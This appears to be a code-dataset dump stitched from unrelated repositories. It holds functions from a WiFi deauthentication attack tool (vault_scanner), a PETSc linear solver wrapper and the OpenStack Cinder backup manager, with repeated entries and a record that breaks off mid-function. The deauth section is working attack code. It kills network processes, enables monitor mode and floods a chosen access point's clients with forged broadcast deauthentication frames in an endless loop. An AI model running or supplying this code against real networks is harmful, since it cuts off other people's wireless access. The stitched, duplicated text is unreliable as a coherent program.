def parseResult(self): '\n Parses and beautifully print\n the monitored result\n ' print(('*' * 61)) print('Index'.ljust(4), '|', ' ESSID '.ljust(30), '|', ' BSSID '.ljust(18), '|') print(('*' * 61)) for index in range(len(self.BSSID)): print(str(index).ljust(5), '|', self.ESSID[index].ljust(30), '|', self.BSSID[index].ljust(17), '|') print(('-' * 61)) print('\n') choice_target = (- 1) while ((choice_target > len(self.BSSID)) or (choice_target < 0)): choice_target = int(input('>> Enter the index of the target : ')) return (self.BSSID[choice_target], self.ESSID[choice_target])
def parseResult(self): '\n Parses and beautifully print\n the monitored result\n ' print(('*' * 61)) print('Index'.ljust(4), '|', ' ESSID '.ljust(30), '|', ' BSSID '.ljust(18), '|') print(('*' * 61)) for index in range(len(self.BSSID)): print(str(index).ljust(5), '|', self.ESSID[index].ljust(30), '|', self.BSSID[index].ljust(17), '|') print(('-' * 61)) print('\n') choice_target = (- 1) while ((choice_target > len(self.BSSID)) or (choice_target < 0)): choice_target = int(input('>> Enter the index of the target : ')) return (self.BSSID[choice_target], self.ESSID[choice_target])<|docstring|>Parses and beautifully print the monitored result<|endoftext|>
ef37d51480d4aee78254ce48c5978c894463dc52154b31e2c0b7528505b7d831
def startMon(self): '\n Puts the selected interface in monitor mode\n ' colors.info('Killing all the process...') kill_process_command = 'airmon-ng check kill' self.quickExecute(kill_process_command) start_mon = subprocess.Popen(['airmon-ng start {}'.format(self.interface)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = start_mon.communicate() if error: print(error.decode('utf-8')) sys.exit(1) colors.info('Monitor mode started')
Puts the selected interface in monitor mode
src/lib/attacks/deauth/deauth_attack.py
startMon
FrancescoPenasa/vault_scanner
230
python
def startMon(self): '\n \n ' colors.info('Killing all the process...') kill_process_command = 'airmon-ng check kill' self.quickExecute(kill_process_command) start_mon = subprocess.Popen(['airmon-ng start {}'.format(self.interface)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = start_mon.communicate() if error: print(error.decode('utf-8')) sys.exit(1) colors.info('Monitor mode started')
def startMon(self): '\n \n ' colors.info('Killing all the process...') kill_process_command = 'airmon-ng check kill' self.quickExecute(kill_process_command) start_mon = subprocess.Popen(['airmon-ng start {}'.format(self.interface)], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, error) = start_mon.communicate() if error: print(error.decode('utf-8')) sys.exit(1) colors.info('Monitor mode started')<|docstring|>Puts the selected interface in monitor mode<|endoftext|>
4b92703258706dcb425539ec8cfdab12e9505cafd4bdf2b59e077e5820634dba
def monInterface(self): '\n Collects the name of the\n new monitor interface\n ' with open(self.DEV_FILE_PATH) as file: data = file.read() mon_intf = re.findall('(mon[0-9]+|prism[0-9]+|\\b([a-zA-Z0-9]+)mon)', data) return mon_intf[0][0]
Collects the name of the new monitor interface
src/lib/attacks/deauth/deauth_attack.py
monInterface
FrancescoPenasa/vault_scanner
230
python
def monInterface(self): '\n Collects the name of the\n new monitor interface\n ' with open(self.DEV_FILE_PATH) as file: data = file.read() mon_intf = re.findall('(mon[0-9]+|prism[0-9]+|\\b([a-zA-Z0-9]+)mon)', data) return mon_intf[0][0]
def monInterface(self): '\n Collects the name of the\n new monitor interface\n ' with open(self.DEV_FILE_PATH) as file: data = file.read() mon_intf = re.findall('(mon[0-9]+|prism[0-9]+|\\b([a-zA-Z0-9]+)mon)', data) return mon_intf[0][0]<|docstring|>Collects the name of the new monitor interface<|endoftext|>
f65b30511ee7b801ba4add4591720461cc4cd598ebeafe0e72992411a79af913
def startProcess(self): '\n Start sending deauth packets\n to the target bssid\n ' t1 = time.time() if self.target_essid: colors.info('Targetting : {} : {}'.format(self.target_bssid, self.target_essid)) else: colors.info('Targetting : {}'.format(self.target_bssid)) colors.success('Deauthentication attack started') colors.info('Press CTRL+C to stop...') addr1 = 'ff:ff:ff:ff:ff:ff' PKT = ((RadioTap() / scapy.all.Dot11(addr1=addr1, addr2=self.target_bssid, addr3=self.target_bssid)) / Dot11Deauth()) try: while True: sendp(PKT, iface=self.monFace, count=1, inter=self.INTER, verbose=False) self.no_of_packets = (self.no_of_packets + 1) print('[+] Sent : {} packets'.format(self.no_of_packets), end='\r') except KeyboardInterrupt: self.restore() except Exception as e: print(e) sys.exit(1) finally: t2 = time.time() colors.success('Deauthentication attack completed in {}'.format((t2 - t1)))
Start sending deauth packets to the target bssid
src/lib/attacks/deauth/deauth_attack.py
startProcess
FrancescoPenasa/vault_scanner
230
python
def startProcess(self): '\n Start sending deauth packets\n to the target bssid\n ' t1 = time.time() if self.target_essid: colors.info('Targetting : {} : {}'.format(self.target_bssid, self.target_essid)) else: colors.info('Targetting : {}'.format(self.target_bssid)) colors.success('Deauthentication attack started') colors.info('Press CTRL+C to stop...') addr1 = 'ff:ff:ff:ff:ff:ff' PKT = ((RadioTap() / scapy.all.Dot11(addr1=addr1, addr2=self.target_bssid, addr3=self.target_bssid)) / Dot11Deauth()) try: while True: sendp(PKT, iface=self.monFace, count=1, inter=self.INTER, verbose=False) self.no_of_packets = (self.no_of_packets + 1) print('[+] Sent : {} packets'.format(self.no_of_packets), end='\r') except KeyboardInterrupt: self.restore() except Exception as e: print(e) sys.exit(1) finally: t2 = time.time() colors.success('Deauthentication attack completed in {}'.format((t2 - t1)))
def startProcess(self): '\n Start sending deauth packets\n to the target bssid\n ' t1 = time.time() if self.target_essid: colors.info('Targetting : {} : {}'.format(self.target_bssid, self.target_essid)) else: colors.info('Targetting : {}'.format(self.target_bssid)) colors.success('Deauthentication attack started') colors.info('Press CTRL+C to stop...') addr1 = 'ff:ff:ff:ff:ff:ff' PKT = ((RadioTap() / scapy.all.Dot11(addr1=addr1, addr2=self.target_bssid, addr3=self.target_bssid)) / Dot11Deauth()) try: while True: sendp(PKT, iface=self.monFace, count=1, inter=self.INTER, verbose=False) self.no_of_packets = (self.no_of_packets + 1) print('[+] Sent : {} packets'.format(self.no_of_packets), end='\r') except KeyboardInterrupt: self.restore() except Exception as e: print(e) sys.exit(1) finally: t2 = time.time() colors.success('Deauthentication attack completed in {}'.format((t2 - t1)))<|docstring|>Start sending deauth packets to the target bssid<|endoftext|>
c3def569b70547604b014931d92a045131cc7a3fd0a6c14018865dafe6c993e3
def restore(self): '\n Restore the network services\n ' colors.info('[!] Restoring the network services...') command0 = 'airmon-ng stop {}'.format(self.monFace) command1 = 'service networking restart' command2 = 'service network-manager restart' self.quickExecute(command0) self.quickExecute(command1) self.quickExecute(command2) colors.success('Restored')
Restore the network services
src/lib/attacks/deauth/deauth_attack.py
restore
FrancescoPenasa/vault_scanner
230
python
def restore(self): '\n \n ' colors.info('[!] Restoring the network services...') command0 = 'airmon-ng stop {}'.format(self.monFace) command1 = 'service networking restart' command2 = 'service network-manager restart' self.quickExecute(command0) self.quickExecute(command1) self.quickExecute(command2) colors.success('Restored')
def restore(self): '\n \n ' colors.info('[!] Restoring the network services...') command0 = 'airmon-ng stop {}'.format(self.monFace) command1 = 'service networking restart' command2 = 'service network-manager restart' self.quickExecute(command0) self.quickExecute(command1) self.quickExecute(command2) colors.success('Restored')<|docstring|>Restore the network services<|endoftext|>
0b7f5d693219c9c9228d67dfeb2a144d7a7a72ec4cddad0458bf26d69dccb246
@classmethod def get_default_properties(cls, algo_name): 'Return the properties of the algorithm.\n It states if it requires symmetric,\n or positive definite matrices for instance.\n Args:\n algo_name: The algorithm name.\n Returns:\n The properties of the solver.\n ' return {cls.LHS_MUST_BE_POSITIVE_DEFINITE: False, cls.LHS_MUST_BE_SYMMETRIC: False, cls.LHS_CAN_BE_LINEAR_OPERATOR: True, cls.INTERNAL_NAME: algo_name}
Return the properties of the algorithm. It states if it requires symmetric, or positive definite matrices for instance. Args: algo_name: The algorithm name. Returns: The properties of the solver.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
get_default_properties
os-climate/sostrades-core
8
python
@classmethod def get_default_properties(cls, algo_name): 'Return the properties of the algorithm.\n It states if it requires symmetric,\n or positive definite matrices for instance.\n Args:\n algo_name: The algorithm name.\n Returns:\n The properties of the solver.\n ' return {cls.LHS_MUST_BE_POSITIVE_DEFINITE: False, cls.LHS_MUST_BE_SYMMETRIC: False, cls.LHS_CAN_BE_LINEAR_OPERATOR: True, cls.INTERNAL_NAME: algo_name}
@classmethod def get_default_properties(cls, algo_name): 'Return the properties of the algorithm.\n It states if it requires symmetric,\n or positive definite matrices for instance.\n Args:\n algo_name: The algorithm name.\n Returns:\n The properties of the solver.\n ' return {cls.LHS_MUST_BE_POSITIVE_DEFINITE: False, cls.LHS_MUST_BE_SYMMETRIC: False, cls.LHS_CAN_BE_LINEAR_OPERATOR: True, cls.INTERNAL_NAME: algo_name}<|docstring|>Return the properties of the algorithm. It states if it requires symmetric, or positive definite matrices for instance. Args: algo_name: The algorithm name. Returns: The properties of the solver.<|endoftext|>
5cfc239c3d2e63b5550f7bf14070b5413b1d394a40d0ed548ca31851fc407413
def _get_options(self, solver_type='gmres', max_iter=100000, tol=1e-200, atol=1e-08, dtol=1e+50, preconditioner_type='ilu', view_config=False, ksp_pre_processor=None, options_cmd=None, set_from_options=False, monitor_residuals=False): 'Return the algorithm options.\n\n This method returns the algoritms options after having done some checks,\n and if necessary,\n set the default values.\n\n Args:\n solver_type: The KSP solver type.\n See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_\n max_iter: The maximum number of iterations.\n tol: The relative convergence tolerance,\n relative decrease in the (possibly preconditioned) residual norm.\n atol: The absolute convergence tolerance of the\n (possibly preconditioned) residual norm.\n dtol: The divergence tolerance,\n e.g. the amount the (possibly preconditioned) residual norm can increase.\n preconditioner_type: The type of the precondtioner,\n see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950\n view_config: Whether to call ksp.view() to view the configuration\n of the solver before run.\n ksp_pre_processor: A callback function that is called with (KSP problem,\n options dict) as arguments before calling ksp.solve().\n It allows the user to obtain an advanced configuration that is not\n supported by the current wrapper.\n If None, do not perform any call.\n options_cmd: The options to pass to the PETSc KSP solver.\n If None, use the default options.\n set_from_options: Whether the options are set from sys.argv,\n a classical Petsc configuration mode.\n monitor_residuals: Whether to store the residuals during convergence.\n WARNING: as said in Petsc documentation,\n "the routine is slow and should be used only for\n testing or convergence studies, not for timing."\n\n Returns:\n The algorithm options.\n ' return self._process_options(max_iter=max_iter, solver_type=solver_type, monitor_residuals=monitor_residuals, tol=tol, atol=atol, dtol=dtol, preconditioner_type=preconditioner_type, view_config=view_config, options_cmd=options_cmd, set_from_options=set_from_options, ksp_pre_processor=ksp_pre_processor)
Return the algorithm options. This method returns the algoritms options after having done some checks, and if necessary, set the default values. Args: solver_type: The KSP solver type. See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_ max_iter: The maximum number of iterations. tol: The relative convergence tolerance, relative decrease in the (possibly preconditioned) residual norm. atol: The absolute convergence tolerance of the (possibly preconditioned) residual norm. dtol: The divergence tolerance, e.g. the amount the (possibly preconditioned) residual norm can increase. preconditioner_type: The type of the precondtioner, see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950 view_config: Whether to call ksp.view() to view the configuration of the solver before run. ksp_pre_processor: A callback function that is called with (KSP problem, options dict) as arguments before calling ksp.solve(). It allows the user to obtain an advanced configuration that is not supported by the current wrapper. If None, do not perform any call. options_cmd: The options to pass to the PETSc KSP solver. If None, use the default options. set_from_options: Whether the options are set from sys.argv, a classical Petsc configuration mode. monitor_residuals: Whether to store the residuals during convergence. WARNING: as said in Petsc documentation, "the routine is slow and should be used only for testing or convergence studies, not for timing." Returns: The algorithm options.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
_get_options
os-climate/sostrades-core
8
python
def _get_options(self, solver_type='gmres', max_iter=100000, tol=1e-200, atol=1e-08, dtol=1e+50, preconditioner_type='ilu', view_config=False, ksp_pre_processor=None, options_cmd=None, set_from_options=False, monitor_residuals=False): 'Return the algorithm options.\n\n This method returns the algoritms options after having done some checks,\n and if necessary,\n set the default values.\n\n Args:\n solver_type: The KSP solver type.\n See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_\n max_iter: The maximum number of iterations.\n tol: The relative convergence tolerance,\n relative decrease in the (possibly preconditioned) residual norm.\n atol: The absolute convergence tolerance of the\n (possibly preconditioned) residual norm.\n dtol: The divergence tolerance,\n e.g. the amount the (possibly preconditioned) residual norm can increase.\n preconditioner_type: The type of the precondtioner,\n see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950\n view_config: Whether to call ksp.view() to view the configuration\n of the solver before run.\n ksp_pre_processor: A callback function that is called with (KSP problem,\n options dict) as arguments before calling ksp.solve().\n It allows the user to obtain an advanced configuration that is not\n supported by the current wrapper.\n If None, do not perform any call.\n options_cmd: The options to pass to the PETSc KSP solver.\n If None, use the default options.\n set_from_options: Whether the options are set from sys.argv,\n a classical Petsc configuration mode.\n monitor_residuals: Whether to store the residuals during convergence.\n WARNING: as said in Petsc documentation,\n "the routine is slow and should be used only for\n testing or convergence studies, not for timing."\n\n Returns:\n The algorithm options.\n ' return self._process_options(max_iter=max_iter, solver_type=solver_type, monitor_residuals=monitor_residuals, tol=tol, atol=atol, dtol=dtol, preconditioner_type=preconditioner_type, view_config=view_config, options_cmd=options_cmd, set_from_options=set_from_options, ksp_pre_processor=ksp_pre_processor)
def _get_options(self, solver_type='gmres', max_iter=100000, tol=1e-200, atol=1e-08, dtol=1e+50, preconditioner_type='ilu', view_config=False, ksp_pre_processor=None, options_cmd=None, set_from_options=False, monitor_residuals=False): 'Return the algorithm options.\n\n This method returns the algoritms options after having done some checks,\n and if necessary,\n set the default values.\n\n Args:\n solver_type: The KSP solver type.\n See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_\n max_iter: The maximum number of iterations.\n tol: The relative convergence tolerance,\n relative decrease in the (possibly preconditioned) residual norm.\n atol: The absolute convergence tolerance of the\n (possibly preconditioned) residual norm.\n dtol: The divergence tolerance,\n e.g. the amount the (possibly preconditioned) residual norm can increase.\n preconditioner_type: The type of the precondtioner,\n see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950\n view_config: Whether to call ksp.view() to view the configuration\n of the solver before run.\n ksp_pre_processor: A callback function that is called with (KSP problem,\n options dict) as arguments before calling ksp.solve().\n It allows the user to obtain an advanced configuration that is not\n supported by the current wrapper.\n If None, do not perform any call.\n options_cmd: The options to pass to the PETSc KSP solver.\n If None, use the default options.\n set_from_options: Whether the options are set from sys.argv,\n a classical Petsc configuration mode.\n monitor_residuals: Whether to store the residuals during convergence.\n WARNING: as said in Petsc documentation,\n "the routine is slow and should be used only for\n testing or convergence studies, not for timing."\n\n Returns:\n The algorithm options.\n ' return self._process_options(max_iter=max_iter, solver_type=solver_type, monitor_residuals=monitor_residuals, tol=tol, atol=atol, dtol=dtol, preconditioner_type=preconditioner_type, view_config=view_config, options_cmd=options_cmd, set_from_options=set_from_options, ksp_pre_processor=ksp_pre_processor)<|docstring|>Return the algorithm options. This method returns the algoritms options after having done some checks, and if necessary, set the default values. Args: solver_type: The KSP solver type. See `https://petsc.org/release/docs/manualpages/KSP/KSPType.html#KSPType`_ max_iter: The maximum number of iterations. tol: The relative convergence tolerance, relative decrease in the (possibly preconditioned) residual norm. atol: The absolute convergence tolerance of the (possibly preconditioned) residual norm. dtol: The divergence tolerance, e.g. the amount the (possibly preconditioned) residual norm can increase. preconditioner_type: The type of the precondtioner, see `https://www.mcs.anl.gov/petsc/petsc4py-current/docs/apiref/petsc4py.PETSc.PC.Type-class.html`_ # noqa: B950 view_config: Whether to call ksp.view() to view the configuration of the solver before run. ksp_pre_processor: A callback function that is called with (KSP problem, options dict) as arguments before calling ksp.solve(). It allows the user to obtain an advanced configuration that is not supported by the current wrapper. If None, do not perform any call. options_cmd: The options to pass to the PETSc KSP solver. If None, use the default options. set_from_options: Whether the options are set from sys.argv, a classical Petsc configuration mode. monitor_residuals: Whether to store the residuals during convergence. WARNING: as said in Petsc documentation, "the routine is slow and should be used only for testing or convergence studies, not for timing." Returns: The algorithm options.<|endoftext|>
65a6fbe86722803d2770fc2ba5714f94dac8696735810cbb503184114e09142f
def __monitor(self, ksp, its, rnorm): 'Add the normed residual value to the problem residual history.\n\n This method is aimed to be passed to petsc4py as a reference.\n This is the reason why some of its arguments are not used.\n\n Args:\n ksp: The KSP PETSc solver.\n its: The current iteration.\n rnorm: The normed residual.\n ' self.problem.residuals_history.append(rnorm)
Add the normed residual value to the problem residual history. This method is aimed to be passed to petsc4py as a reference. This is the reason why some of its arguments are not used. Args: ksp: The KSP PETSc solver. its: The current iteration. rnorm: The normed residual.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
__monitor
os-climate/sostrades-core
8
python
def __monitor(self, ksp, its, rnorm): 'Add the normed residual value to the problem residual history.\n\n This method is aimed to be passed to petsc4py as a reference.\n This is the reason why some of its arguments are not used.\n\n Args:\n ksp: The KSP PETSc solver.\n its: The current iteration.\n rnorm: The normed residual.\n ' self.problem.residuals_history.append(rnorm)
def __monitor(self, ksp, its, rnorm): 'Add the normed residual value to the problem residual history.\n\n This method is aimed to be passed to petsc4py as a reference.\n This is the reason why some of its arguments are not used.\n\n Args:\n ksp: The KSP PETSc solver.\n its: The current iteration.\n rnorm: The normed residual.\n ' self.problem.residuals_history.append(rnorm)<|docstring|>Add the normed residual value to the problem residual history. This method is aimed to be passed to petsc4py as a reference. This is the reason why some of its arguments are not used. Args: ksp: The KSP PETSc solver. its: The current iteration. rnorm: The normed residual.<|endoftext|>
b447462259225b310e2e5163f8f3679dac4078e3299d6c6e8c58747383aaa41f
def _run(self, **options): 'Run the algorithm.\n\n Args:\n **options: The algorithm options.\n\n Returns:\n The solution of the problem.\n ' options['max_iter'] = int(options['max_iter']) options['atol'] = options['tol'] options['tol'] = self.default_tol b = self.problem.rhs A = self.problem.lhs if ('maxiter' not in options): options['maxiter'] = (50 * b.shape[0]) else: options['maxiter'] = min(options['maxiter'], (50 * A.shape[0])) options['old_sol'] = None (sol, info, ksp) = self._run_petsc_strategy(**options) if (info < 0): options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) if (info >= 0): LOGGER.warning(f'The second try with GASM preconditioner and bi CG stabilized linear solver has converged at {ksp.getResidualNorm()}') elif (info == (- 3)): LOGGER.warning(f"DIVERGED_ITS error : the number of iterations of the solver is {len(ksp.getConvergenceHistory())} with a max iter of {options['maxiter']}, try to launch again with 10*max_iter") options['maxiter'] = (10 * options['maxiter']) options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) return self.problem.solution
Run the algorithm. Args: **options: The algorithm options. Returns: The solution of the problem.
sos_trades_core/execution_engine/gemseo_addon/linear_solvers/ksp_lib.py
_run
os-climate/sostrades-core
8
python
def _run(self, **options): 'Run the algorithm.\n\n Args:\n **options: The algorithm options.\n\n Returns:\n The solution of the problem.\n ' options['max_iter'] = int(options['max_iter']) options['atol'] = options['tol'] options['tol'] = self.default_tol b = self.problem.rhs A = self.problem.lhs if ('maxiter' not in options): options['maxiter'] = (50 * b.shape[0]) else: options['maxiter'] = min(options['maxiter'], (50 * A.shape[0])) options['old_sol'] = None (sol, info, ksp) = self._run_petsc_strategy(**options) if (info < 0): options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) if (info >= 0): LOGGER.warning(f'The second try with GASM preconditioner and bi CG stabilized linear solver has converged at {ksp.getResidualNorm()}') elif (info == (- 3)): LOGGER.warning(f"DIVERGED_ITS error : the number of iterations of the solver is {len(ksp.getConvergenceHistory())} with a max iter of {options['maxiter']}, try to launch again with 10*max_iter") options['maxiter'] = (10 * options['maxiter']) options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) return self.problem.solution
def _run(self, **options): 'Run the algorithm.\n\n Args:\n **options: The algorithm options.\n\n Returns:\n The solution of the problem.\n ' options['max_iter'] = int(options['max_iter']) options['atol'] = options['tol'] options['tol'] = self.default_tol b = self.problem.rhs A = self.problem.lhs if ('maxiter' not in options): options['maxiter'] = (50 * b.shape[0]) else: options['maxiter'] = min(options['maxiter'], (50 * A.shape[0])) options['old_sol'] = None (sol, info, ksp) = self._run_petsc_strategy(**options) if (info < 0): options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) if (info >= 0): LOGGER.warning(f'The second try with GASM preconditioner and bi CG stabilized linear solver has converged at {ksp.getResidualNorm()}') elif (info == (- 3)): LOGGER.warning(f"DIVERGED_ITS error : the number of iterations of the solver is {len(ksp.getConvergenceHistory())} with a max iter of {options['maxiter']}, try to launch again with 10*max_iter") options['maxiter'] = (10 * options['maxiter']) options['solver_type'] = 'bcgs' options['preconditioner_type'] = 'gasm' options['old_sol'] = sol (sol, info, ksp) = self._run_petsc_strategy(**options) return self.problem.solution<|docstring|>Run the algorithm. Args: **options: The algorithm options. Returns: The solution of the problem.<|endoftext|>
73c675da3edc02e35f180e125ff42dc4891c7a870b5992d81b68e29a6d74ae64
@property def driver_name(self): 'This function maps old backup services to backup drivers.' return self._map_service_to_driver(CONF.backup_driver)
This function maps old backup services to backup drivers.
cinder/backup/manager.py
driver_name
inspur-storage/cinder
1
python
@property def driver_name(self): return self._map_service_to_driver(CONF.backup_driver)
@property def driver_name(self): return self._map_service_to_driver(CONF.backup_driver)<|docstring|>This function maps old backup services to backup drivers.<|endoftext|>
9bbd084acf25878e88b428a486a2eb4c269e162d06b77fc561f75e779b5f3c8d
def _map_service_to_driver(self, service): 'Maps services to drivers.' if (service in mapper): msg = "Using legacy backup service configuration like cinder.backup.services.* is deprecated and will be removed in the 'R' release. Please use the cinder.backup.drivers.* method instead." versionutils.report_deprecated_feature(LOG, msg) return mapper[service] return service
Maps services to drivers.
cinder/backup/manager.py
_map_service_to_driver
inspur-storage/cinder
1
python
def _map_service_to_driver(self, service): if (service in mapper): msg = "Using legacy backup service configuration like cinder.backup.services.* is deprecated and will be removed in the 'R' release. Please use the cinder.backup.drivers.* method instead." versionutils.report_deprecated_feature(LOG, msg) return mapper[service] return service
def _map_service_to_driver(self, service): if (service in mapper): msg = "Using legacy backup service configuration like cinder.backup.services.* is deprecated and will be removed in the 'R' release. Please use the cinder.backup.drivers.* method instead." versionutils.report_deprecated_feature(LOG, msg) return mapper[service] return service<|docstring|>Maps services to drivers.<|endoftext|>
d8f872f8bb5b9c85bd8b60bce167deec89bb062c7f27b822a12dc192c83117b2
def init_host(self, **kwargs): 'Run initialization needed for a standalone service.' ctxt = context.get_admin_context() self.setup_backup_backend(ctxt) try: self._cleanup_incomplete_backup_operations(ctxt) except Exception: LOG.exception('Problem cleaning incomplete backup operations.')
Run initialization needed for a standalone service.
cinder/backup/manager.py
init_host
inspur-storage/cinder
1
python
def init_host(self, **kwargs): ctxt = context.get_admin_context() self.setup_backup_backend(ctxt) try: self._cleanup_incomplete_backup_operations(ctxt) except Exception: LOG.exception('Problem cleaning incomplete backup operations.')
def init_host(self, **kwargs): ctxt = context.get_admin_context() self.setup_backup_backend(ctxt) try: self._cleanup_incomplete_backup_operations(ctxt) except Exception: LOG.exception('Problem cleaning incomplete backup operations.')<|docstring|>Run initialization needed for a standalone service.<|endoftext|>
5f06e0d0f87c695962595af82a4cadf26cadc9fea1e6233a171e314a073964e2
def create_backup(self, context, backup): 'Create volume backups using configured backup service.' volume_id = backup.volume_id snapshot_id = backup.snapshot_id volume = objects.Volume.get_by_id(context, volume_id) snapshot = (objects.Snapshot.get_by_id(context, snapshot_id) if snapshot_id else None) previous_status = volume.get('previous_status', None) updates = {} if snapshot_id: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s snapshot: %(snapshot_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id, 'snapshot_id': snapshot_id}) else: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id}) LOG.info(log_message) self._notify_about_backup_usage(context, backup, 'create.start') backup.host = self.host backup.service = self.driver_name backup.availability_zone = self.az backup.save() expected_status = 'backing-up' if snapshot_id: actual_status = snapshot['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected snapshot status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidSnapshot(reason=err) else: actual_status = volume['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.CREATING actual_status = backup.status if (actual_status != expected_status): err = (_('Create backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: if (not self.is_working()): err = _('Create backup aborted due to backup service is down') self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) updates = self._run_backup(context, backup, volume) except Exception as err: with excutils.save_and_reraise_exception(): if snapshot_id: snapshot.status = fields.SnapshotStatus.AVAILABLE snapshot.save() else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'error_backing-up'}) self._update_backup_error(backup, six.text_type(err)) if snapshot_id: self.db.snapshot_update(context, snapshot_id, {'status': fields.BackupStatus.AVAILABLE}) else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'backing-up'}) backup.status = fields.BackupStatus.AVAILABLE backup.size = volume['size'] if updates: backup.update(updates) backup.save() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) parent_backup.num_dependent_backups += 1 parent_backup.save() LOG.info('Create backup finished. backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'create.end')
Create volume backups using configured backup service.
cinder/backup/manager.py
create_backup
inspur-storage/cinder
1
python
def create_backup(self, context, backup): volume_id = backup.volume_id snapshot_id = backup.snapshot_id volume = objects.Volume.get_by_id(context, volume_id) snapshot = (objects.Snapshot.get_by_id(context, snapshot_id) if snapshot_id else None) previous_status = volume.get('previous_status', None) updates = {} if snapshot_id: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s snapshot: %(snapshot_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id, 'snapshot_id': snapshot_id}) else: log_message = ('Create backup started, backup: %(backup_id)s volume: %(volume_id)s.' % {'backup_id': backup.id, 'volume_id': volume_id}) LOG.info(log_message) self._notify_about_backup_usage(context, backup, 'create.start') backup.host = self.host backup.service = self.driver_name backup.availability_zone = self.az backup.save() expected_status = 'backing-up' if snapshot_id: actual_status = snapshot['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected snapshot status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidSnapshot(reason=err) else: actual_status = volume['status'] if (actual_status != expected_status): err = (_('Create backup aborted, expected volume status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidVolume(reason=err) expected_status = fields.BackupStatus.CREATING actual_status = backup.status if (actual_status != expected_status): err = (_('Create backup aborted, expected backup status %(expected_status)s but got %(actual_status)s.') % {'expected_status': expected_status, 'actual_status': actual_status}) self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) try: if (not self.is_working()): err = _('Create backup aborted due to backup service is down') self._update_backup_error(backup, err) raise exception.InvalidBackup(reason=err) updates = self._run_backup(context, backup, volume) except Exception as err: with excutils.save_and_reraise_exception(): if snapshot_id: snapshot.status = fields.SnapshotStatus.AVAILABLE snapshot.save() else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'error_backing-up'}) self._update_backup_error(backup, six.text_type(err)) if snapshot_id: self.db.snapshot_update(context, snapshot_id, {'status': fields.BackupStatus.AVAILABLE}) else: self.db.volume_update(context, volume_id, {'status': previous_status, 'previous_status': 'backing-up'}) backup.status = fields.BackupStatus.AVAILABLE backup.size = volume['size'] if updates: backup.update(updates) backup.save() if backup.parent_id: parent_backup = objects.Backup.get_by_id(context, backup.parent_id) parent_backup.num_dependent_backups += 1 parent_backup.save() LOG.info('Create backup finished. backup: %s.', backup.id) self._notify_about_backup_usage(context, backup, 'create.end')
